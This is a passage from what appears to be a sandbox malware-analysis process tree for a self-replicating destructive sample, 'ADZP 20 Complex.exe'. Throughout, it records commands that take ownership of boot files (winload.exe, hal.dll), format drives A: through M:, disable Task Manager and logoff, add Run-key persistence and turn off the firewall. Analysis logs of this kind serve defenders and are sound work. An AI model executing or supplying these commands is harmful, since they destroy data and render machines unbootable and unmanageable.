        
        PID:13572
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:13596
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:4688
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:2988
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:4184
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        
        PID:3168
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:4136
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\784B.tmp\788B.tmp\788C.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        
        PID:10208
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:11008
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        
        PID:11052
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        Modifies file permissions
        
        PID:12284
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        Views/modifies file attributes
        
        PID:12176
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        
        PID:12724
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        
        PID:11752
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        Views/modifies file attributes
        
        PID:6568
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        Modifies file permissions
        
        PID:9480
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        Modifies file permissions
        
        PID:13424
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        Views/modifies file attributes
        
        PID:13564
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:4360
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:5088
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:4692
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        
        PID:4264
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:3692
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6C7A.tmp\6C7A.tmp\6C7B.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        
        PID:9248
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:10568
        
        C:\Windows\SysWOW64\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        Possible privilege escalation attempt
        
        PID:10672
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        
        PID:11436
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        
        PID:11924
        
        C:\Windows\SysWOW64\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        
        PID:10520
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        
        PID:13128
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        Views/modifies file attributes
        
        PID:13276
        
        C:\Windows\SysWOW64\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        Possible privilege escalation attempt
        
        PID:12924
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        Modifies file permissions
        
        PID:12760
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        Views/modifies file attributes
        
        PID:5988
        
        C:\Windows\SysWOW64\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:13704
        
        C:\Windows\SysWOW64\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:13744
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:4944
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:5128
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:5148
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        
        PID:5164
    - - C:\Windows\system32\format.com
        
        format /y /q A:
        5⤵
        
        PID:5308
    - - C:\Windows\system32\format.com
        
        format /y /q B:
        5⤵
        
        PID:6136
    - - C:\Windows\system32\format.com
        
        format /y /q D:
        5⤵
        
        PID:6184
    - - C:\Windows\system32\format.com
        
        format /y /q E:
        5⤵
        
        PID:6548
    - - C:\Windows\system32\format.com
        
        format /y /q F:
        5⤵
        
        PID:6788
    - - C:\Windows\system32\format.com
        
        format /y /q G:
        5⤵
        
        PID:4704
    - - C:\Windows\system32\format.com
        
        format /y /q H:
        5⤵
        
        PID:5540
    - - C:\Windows\system32\format.com
        
        format /y /q I:
        5⤵
        
        PID:7308
    - - C:\Windows\system32\format.com
        
        format /y /q J:
        5⤵
        
        PID:8560
    - - C:\Windows\system32\format.com
        
        format /y /q K:
        5⤵
        
        PID:10228
    - - C:\Windows\system32\format.com
        
        format /y /q L:
        5⤵
        
        PID:8832
    - - C:\Windows\system32\format.com
        
        format /y /q M:
        5⤵
        
        PID:7000
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\vbisurf.ax"
        5⤵
        Modifies file permissions
        
        PID:12780
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:2892
- - C:\Windows\system32\notepad.exe
    notepad
    3⤵
    PID:2572
- - C:\Windows\system32\calc.exe
    calc
    3⤵
    PID:2396
- - C:\Windows\system32\mspaint.exe
    mspaint
    3⤵
    - Drops file in Windows directory
    - Suspicious use of SetWindowsHookEx
    PID:2544
- - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
    "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:1260
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\BC6C.tmp\BC6D.tmp\BC6E.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
      4⤵
      Drops startup file
      PID:2212
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        5⤵
        
        PID:608
      - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        6⤵
        Possible privilege escalation attempt
        Suspicious use of AdjustPrivilegeToken
        
        PID:1728
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        5⤵
        Possible privilege escalation attempt
        Suspicious use of AdjustPrivilegeToken
        
        PID:1588
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        5⤵
        Possible privilege escalation attempt
        
        PID:3052
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        5⤵
        
        PID:2652
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        Suspicious use of AdjustPrivilegeToken
        
        PID:2516
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        5⤵
        
        PID:2604
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        5⤵
        
        PID:1724
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1456
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        5⤵
        
        PID:2168
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        5⤵
        Views/modifies file attributes
        
        PID:2024
    - - C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        5⤵
        
        PID:2072
    - - C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        5⤵
        
        PID:1748
    - - C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        5⤵
        
        PID:2328
    - - C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        5⤵
        Gathers network information
        
        PID:1068
    - - C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        5⤵
        Adds Run key to start application
        
        PID:1484
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        5⤵
        Drops autorun.inf file
        Views/modifies file attributes
        
        PID:1560
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:1900
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:2020
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:2124
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:2504
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:2928
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:1496
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:1388
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:1136
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:1436
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:2604
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:2512
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E244.tmp\E245.tmp\E246.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        
        PID:4276
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:4672
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        
        PID:6908
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4692
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        
        PID:4760
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        Views/modifies file attributes
        
        PID:4820
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        Possible privilege escalation attempt
        
        PID:5080
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        
        PID:4772
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        
        PID:1936
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        Possible privilege escalation attempt
        
        PID:4656
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        Modifies file permissions
        
        PID:4944
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        
        PID:4464
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:4100
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:5108
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        7⤵
        
        PID:5460
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:6900
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        7⤵
        
        PID:7048
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        Views/modifies file attributes
        
        PID:6416
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:6752
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:7096
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:7104
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:5708
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:4588
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:4028
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:7004
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:6960
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:6420
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:6072
        
        C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        7⤵
        
        PID:6172
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:6996
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:7176
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:7184
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:7200
        
        C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        7⤵
        
        PID:7220
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:7232
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:7256
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:7264
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:7272
        
        C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        7⤵
        
        PID:7280
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:7292
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:7324
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:7340
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:7380
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:7420
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:8668
        
        C:\Windows\system32\reg.exe
        
        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:9440
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:1952
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
        7⤵
        
        PID:6300
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set allprofiles state off
        7⤵
        Modifies Windows Firewall
        
        PID:13340
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:2624
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:624
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:2276
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        Drops file in Windows directory
        Suspicious use of SetWindowsHookEx
        
        PID:2444
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:2716
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E3DA.tmp\E3DB.tmp\E3DC.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        
        PID:4320
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:4324
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        Possible privilege escalation attempt
        
        PID:6880
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        Possible privilege escalation attempt
        
        PID:3940
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        
        PID:4328
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        
        PID:4964
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        Modifies file permissions
        
        PID:4284
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        
        PID:3600
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        
        PID:4184
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        
        PID:4820
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4704
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        Views/modifies file attributes
        
        PID:2988
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:4984
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:3936
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        7⤵
        
        PID:6168
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:7104
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        7⤵
        
        PID:5668
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        Views/modifies file attributes
        
        PID:6772
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:4040
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:7348
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:7396
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:7428
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:7440
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:7448
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:7476
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:7516
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:7548
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:7588
        
        C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        7⤵
        
        PID:7644
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:7756
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:7992
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:8052
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:8092
        
        C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        7⤵
        
        PID:8172
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:1752
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:1988
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:6064
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:7472
        
        C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        7⤵
        
        PID:8196
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:8224
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:8276
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:8336
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:8400
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:8448
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:10080
        
        C:\Windows\system32\reg.exe
        
        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:12048
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:13256
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:11052
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:1568
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:2000
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:2428
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        Drops file in Windows directory
        Suspicious use of SetWindowsHookEx
        
        PID:2240
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:780
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E512.tmp\E513.tmp\E514.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        
        PID:3900
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:3968
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        
        PID:6948
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        
        PID:5040
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        
        PID:3224
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        Views/modifies file attributes
        
        PID:4940
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4332
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        
        PID:4964
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        Views/modifies file attributes
        
        PID:4740
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        
        PID:4468
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        
        PID:1188
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        
        PID:3276
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:3268
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:4304
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        7⤵
        
        PID:6224
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:7096
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        7⤵
        
        PID:6264
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        
        PID:6700
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:5800
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:7332
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:7356
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:7408
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:7464
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:7484
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:7524
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:7556
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:7608
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:7668
        
        C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        7⤵
        
        PID:7712
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:7776
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:7912
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:7960
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:8000
        
        C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        7⤵
        
        PID:8060
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:8112
        
        C:\Windows\system32\notepad.exe
        
